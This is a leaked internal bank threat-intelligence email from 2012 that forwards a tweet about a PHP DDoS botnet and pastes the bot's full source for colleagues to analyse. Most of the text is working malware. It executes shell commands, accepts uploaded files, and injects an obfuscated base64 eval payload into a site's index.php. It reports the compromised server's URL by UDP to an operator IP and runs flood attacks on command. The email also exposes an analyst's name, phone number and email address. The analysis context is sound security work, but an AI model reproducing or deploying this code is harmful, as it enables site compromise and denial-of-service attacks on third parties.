Source of original file: http://par-anoia.net/assessment/us/bofa/allTexts/emails/55. 1_13_2012 - EWT - TACTO.

txt [To avoid automatic deletion by AV programs the term "perl" has been replaced with "xxxx". If perl is re-inserted do not run or autorun this program to avoid infection.] [Begin file] Subject: EWT - TACTO -------------------BAML-EWT logo.png

Source: Tweet Deck

Date / Time: 031123Jan12

Summary of information: ncaproni tweeted RT @anastayseea: #PHP #DDoS #botnet se promne sur le #Web http://t.co/d6MqeMBJ

Comment: This looks similar to the code found in the Russian blog. This paste has 1,464 hits and was uploaded January 11, 2012. Ccing Mike and Jas for analysis. Ends.

<?php error_reporting(0); $base = dirname(__FILE__)."/"; function stoped() {cmdexec("killall -9 xxxx; killall -9 xxxx-bin; killall -9 xxxx-cgi; "); unlink($base."start.php"); unlink($base."f1.pl"); unlink($base."run.pl"); unlink($base."startphp.php"); print "<stopcleandos>Stop & Clean</stopcleandos>"; apache_child_terminate(); }function UploadFile($File){cmdexec("killall -9 xxxx"); cmdexec("killall -9 xxxx-bin"); cmdexec("killall -9 xxxx-cgi"); $target_path ="./";

$target_path = $target_path . basename( $File['name']); @move_uploaded_file($File['tmp_name'], $target_path); }function cmdexec($cmd){if(function_exists('system'))@system($cmd); elseif(function_exists('passthru'))@passthru($cmd); elseif(function_exists('shell_exec'))@shell_exec($cmd); elseif(function_exists('exec'))@exec($cmd); elseif(function_exists('popen'))@popen($cmd,"r"); }function curPageURL(){$pageURL = 'http'; if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s"; }$pageURL .= "://"; if ($_SERVER["SERVER_PORT"] != "80") {$pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"]; } else {$pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]; }return $pageURL; }function DNullRequest() {@ob_start(); print "<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /indx.php was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>"; die(); }if ($_GET['action']=="status") {print "itsoknoproblembro"; exit(); }if ($_GET['action']=="start.php") {cmdexec("ps | grep -r xxxx"); exit(); }if ($_GET['action']=="startphp.php") {cmdexec("ps | grep -r php"); exit(); }if ($_GET['action']=="infection") {$up = "<?php eval(gzinflate(base64_decode('jVPva5xAEP1+cP/DsAh3QlNb6IfQqF8S0xaSXrjzAsUc4rl7vQV1l3UsTUL+9+4vg/RSqMi6uu/Nm5k3M qWEKhWTQiHvfi4/hBfzWUBFrSCBoNxk6/tsXZCr1eX2Nvuel+vVKic7jeEHWAbllywvFoNsFjtIEliIii5CeJ7PWH0UEMfx1/z2Zj6LZWqXa 94w2MpGw+Jon8aR/e5WrPYNM5uDUC2wrsZHyRLSDg1yWSmMzPczWmFFAFqGR0ETcrfa5MSQeCcHBEc5ckpZR6CrWv1W1Q R+Vc2gt4NVtnhUdqWplusQev6kzz+S9IcYFNg0P0McmbNUPzXOoV+VHOHT+ahy0BTi9e0+HVmRl/qHoOsGXHH134q+GmtSNCYg KzyOCSD7jSdd6Yd9y/GVvfW98FIBso7OZ8Yu7y3ve4baYdPiwoXfhaG2NnBtNFXaEZkC3gfl9bebbFO4JuwKYrKbzMsUnCSEhM9/h3 ub/+IC1EI+Lk8w2MrS4d7BJFxoJxH0ZaeRWFvdMaOAQjd8gn7oyMUUfQYb3XGNIXBalTFDVwvEsV6ANT0b1aTi2mGSmT8L/Lj7mf Jwd/8B'))); ?>"; $index =$_SERVER['DOCUMENT_ROOT']."/index.php"; if (file_exists($index)) {$fp = @fopen($index, 'a+'); @fwrite($fp, $up); @fclose($fp);

$content = file_get_contents($index); if (eregi("RSqMi6uu",$content)) {print "<infectdos>Infected</infectdos>"; }else{print "<infectdos>Not Infected</infectdos>"; }}else{print "<infectdos>N E I</infectdos>";}}switch($_POST['action']){case "upload":UploadFile($_FILES['file']); break; case "stop":stoped(); break; case "ust":$page = curPageURL(); $ip = $_POST['ip']; $port = "11"; $out = $page."\n"; $socket = stream_socket_client("udp://$ip:$port"); if ($socket) {stream_set_write_buffer($socket, 0); stream_socket_sendto($socket,$out); }fclose($socket); break; case "ab":$url = $_POST['url']; $c = $_POST['c']; $n = $_POST['n']; cmdexec("ab -c $c -n $n $url"); break; default:DNullRequest(); break; }?>

Shawn Holtz Threat Analysis and Vulnerability Assessment - Threat Management TEKsystems - Onsite at Bank of America Office: (704) 307-6960 Email: shawn.holtz@bankofamerica.com

BAML-EWT email.png [End file]